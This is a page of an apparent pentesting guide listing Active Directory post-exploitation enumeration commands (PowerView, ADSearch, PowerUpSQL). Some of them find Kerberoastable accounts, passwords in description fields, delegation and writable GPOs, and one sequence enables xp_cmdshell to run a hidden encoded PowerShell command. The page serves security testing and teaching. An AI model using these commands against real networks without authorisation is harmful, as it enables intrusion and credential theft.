The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Domain
  • General Information
  • Forest
  • Trust
  • Users
  • General Information
  • Security
  • Groups
  • Computers
  • General information
  • Security
  • Group Policies Objects (GPO)s
  • General information
  • Get Modifiable GPOs
  • Organizational Units (OU)
  • Access Control Lists (ACL)s
  • Shares
  • MSSQL
  • General information
  • Links
  • Perform Queries
  • CMDShell
  • Tools
  • References
  1. Situational Awareness

Active Directory

Introduction

Once the attacker has obtained a foothold on a computer inside an Active Directory network, its design must be understood, including the number of users, groups, computers, OUs, ACLs, and their relationships.

In this phase, the attacker should be focused on enumerating information that can be further used to elevate privileges or perform lateral movements.

Domain

General Information

  • Get current domain

Get-Domain [-Domain <DIFFERENT_DOMAIN>]
Get-ADDomain [-Identity <DOMAIN>]
  • Get current domain controller

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 
Get-ADDomainController [-DomainName <DOMAIN>] [-Discover]
  • Get domain policy data

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 

Forest

  • Return the forest object

Get-Forest [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>]
  • Get all domains from your current forest

Get-ForestDomain [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>] | fl Domains
  • Get the Global Catalogs of the forest

Get-ForestGlobalCatalog [-Forest <FOREST>]
Get-ADForest | select -ExpandProperty GlobalCatalogs

Trust

  • Return all domain trusts for the current or specified domain

Get-DomainTrust [-Domain <DomainName>]
Get-ADTrust {-Filter * | -Identity "<Domain>"}
nltest /domain_trusts
  • Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds.

Get-DomainTrustMapping
  • Return all forest trusts for the current forest or a specified forest.

Get-ForestTrust [-Forest <"FOREST>"]
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

Users

General Information

  • Obtain users

Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname
Get-ADUser -Filter * | ?{ $_.Enabled -eq "true" }  Select SamAccountName
# Detailed information about a user
Get-ADUser -Identity <USERNAME> -Properties *
.\ADSearch.exe --search "objectCategory=user"
  • Built-in accounts

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description
  • Get group memberships

Get-DomainGroup -UserName "<USERNAME>"
Get-ADPrincipalGroupMembership -Identity "<USERNAME>"
  • Obtain the Last time a password was set of each user

Get-ADUser -Filter * -Properties * | select name ,logoncount ,@{expression={[datetime]::fromFileTime($_pwdlastset)}}
  • Finds domain machines where specific users are logged into. By default 'Domain Admins'

Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]

Security

  • Kerberoast

Get-DomainUser -SPN | select serviceprincipalname
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
.\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
  • AS-Reporoast

Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True } -Properties DoesNotRequirePreAuth | select UserPrincipalName
  • Search passwords on the description attribute

Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description
  • Show in which machine you are admin (based on your current privileges)

Find-LocalAdminAccess
  • Constrained delegation

Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
 .\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Groups

  • List all the groups in the current domain

Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]
Get-ADGroup -Filter * | select name
# More detailed version
Get-ADGroup -Filter * -Properties *
# Admin Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))" [--attributes cn,member]
# MSSQL Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member
  • List all the members in a specific group:

Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]	
Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object SamAccountName
  • List groups of a user

Get-ADPrincipalGroupMembership <USER> 
  • Get GPOs of a group

Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Computers

General information

  • List computers

Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"

# Get Name, IP and Operating System
Get-NetComputer  -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_  } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize
Get-AdComputer -Filter * | select Name
  • Return PCs that can be pinged

Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime} 
  • Get users logged on (Requires admin privileges)

Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username
  • Get locally logged on users

Get-LoggedonLocal -ComputerName "<HOSTNAME>"
  • Enumerates local or groups on a machine (Requires admin privileges).

Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
  • Returns the last user who logged onto the local machine (Requires administrative rights and remote registry enabled on the target)

Get-LastLoggedOn -ComputerName <HOSTNAME>

Security

  • Enumerate all ACES for all domain computers that matches our current computer.

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity |  Format-List}}
Get-DomainComputer -UnConstrained | select samaccountname
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
.\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl

Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl

Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Need a privilege like WriteProperty, GenericAll, GenericWrite or WriteDacl on the computer object:

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
.\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Group Policies Objects (GPO)s

General information

  • Get list of GPO in current domain.

Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName
  • Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences:

Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName
  • Enumerates the machines where a specific domain user/group is a member of a specific local group (Useful for finding where domain groups have local admin access):

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
  • Finds what users/groups are in the specified local group for a target machine through GPO correlation

Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"

Get Modifiable GPOs

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Principals with "Create groupPolicyContainer objects" privilege

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Organizational Units (OU)

  • Get Domain Organizational Units:

Get-DomainOU [-Properties Name | sort -Property Name]
Get-ADOrganizationalUnit -Filter * -Properties *
  • Get GPO applied to an OU

Get-DomainGPO -Identity "<GPLink_RelativeCN>"

Access Control Lists (ACL)s

  • Enumerate user rights:

Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs 
  • Returns the ACLs associated with a specific active directory object.

Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=cs,DC=org').Access
  • Finds interesting object ACLS in the current domain

Find-InterestingDomainAcl -ResolveGUIDs
  • Enumerate RDP Users permissions

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Shares

  • Enumerate shares:

Find-DomainShare
# Enumerate the Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
  • Enumerates the shares you have access

Find-DomainShare -CheckShareAccess
  • Find shares on hosts in current domain.

Invoke-ShareFinder -Verbose
  • Get all fileservers of the domain

Get-NetFileServer
  • Searches for files matching specific criteria on readable shares in the domain

Invoke-FileFinder -Verbose

MSSQL

General information

  • Discover Active Directory Domain SQL Server Instances

Get-SQLInstanceDomain
  • Tests if the current Windows account or provided SQL Server login can log into an SQL Server.

Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances use the following oneline
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
  • Returns basic server and user information from target SQL Servers.

Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"

Links

  • Look for links to remote servers

Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>" 
select * from master..sysservers
  • Enumerate and follow MSSQL database links

Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>" 

Perform Queries

  • Perform queries

Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
  • Perform queries using the linked database

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

CMDShell

  • Check if xp_cmdshell module is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
  • Enable xp_cmdshell

sp_configure 'Show Advanced Options', 1; RECONFIGURE;sp_configure 'xp_cmdshell', 1; RECONFIGURE;
  • Execute commands

"EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';

Tools

References

Last updated 1 month ago

To obtain GPO name from GPOUid use Get-GPO -Guid "{...}"

Computers with unconstrained delegation: Exploitation at

Computers with constrained delegation: Exploitation at

Resource-Based Constrained Delegation: Exploitation at

: Automates a number of Active Directory Enumeration and Vulnerability checks.

: PowerShell tool to gain network situational awareness on Windows domains.

: Perform LDAP queries.

: Module that includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post-exploitation actions such as OS command execution.

: The Active Directory module for Windows PowerShell.

ℹ️
LinWinPwn
PowerView
ADSearch
PowerUPSQL
ADModule
AD Enumeration Toolkit
Bloodhound docs
PowerView (HackTricks)
Red Team Ops
Unconstrained Delegation
Constrained Delegation
Resource-Based Constrained Delegation (GenericWrite to Computer)